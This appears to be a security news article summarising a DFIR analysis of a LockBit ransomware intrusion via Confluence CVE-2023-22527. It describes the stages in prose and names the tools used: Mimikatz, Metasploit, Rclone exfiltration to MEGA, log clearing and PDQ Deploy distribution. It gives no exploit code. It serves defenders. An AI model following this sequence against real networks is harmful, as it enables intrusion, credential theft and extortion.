LockBit Ransomware Strikes: Exploiting a Confluence Vulnerability

In a swift and highly coordinated attack, LockBit ransomware operators exploited a critical remote code execution vulnerability (CVE-2023-22527) in Atlassian Confluence servers, targeting an exposed Windows server.

This vulnerability, rated CVSS 10.0, enabled unauthenticated attackers to execute arbitrary commands by injecting malicious Object-Graph Navigation Language (OGNL) expressions into improperly sanitized template files.

The attack commenced with system discovery commands, such as net user and whoami, to enumerate user accounts and gather system details.

The attackers leveraged this initial foothold to deploy AnyDesk for persistent access and used the Metasploit framework to establish command-and-control (C2) channels.

Within minutes, they escalated privileges by creating a new local administrator account and proceeded to disable security defenses, including Windows Defender.

Rapid Lateral Movement and Exfiltration

Using Remote Desktop Protocol (RDP), the attackers moved laterally across the network, targeting key systems such as backup servers and file shares.

According to the DFIR Report, they employed tools like Mimikatz to extract credentials and SoftPerfect’s NetScan for network enumeration.

On the backup server, they executed PowerShell scripts to retrieve sensitive Veeam credentials and accessed additional systems using these compromised accounts.

Data exfiltration began just over an hour into the intrusion. The attackers used Rclone, a legitimate cloud storage tool, to transfer sensitive files to MEGA.io.

To cover their tracks, they cleared Windows event logs and deleted files associated with their operations.

LockBit Ransomware Deployment

Approximately two hours after initial access, the attackers launched the LockBit ransomware payload.

Initially, ransomware binaries were executed manually on specific servers via active RDP sessions.

To ensure widespread encryption, they utilized PDQ Deploy, an enterprise software deployment tool, automating the distribution of ransomware binaries across multiple endpoints via SMB shares.

A secondary encryption wave was triggered by mounting remote systems’ C$ shares as a failsafe mechanism.

The attack culminated in encrypted files bearing the .rhddiicoE extension and ransom notes left on compromised systems.

The attackers also altered desktop backgrounds as part of their ransomware execution process.

• Time-to-Ransom (TTR): The entire operation—from initial access to full ransomware deployment—was completed in just over two hours, showcasing exceptional speed and precision.
• Sophisticated Toolset: The threat actors employed a wide array of tools, including Mimikatz for credential theft, Metasploit for C2 operations, and PDQ Deploy for automated ransomware distribution.
• Exploitation Details: The attack exploited CVE-2023-22527 through crafted HTTP POST requests targeting vulnerable endpoints in Confluence servers.

This incident underscores the critical importance of patching known vulnerabilities promptly and implementing robust monitoring mechanisms to detect anomalous activity early in its lifecycle.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here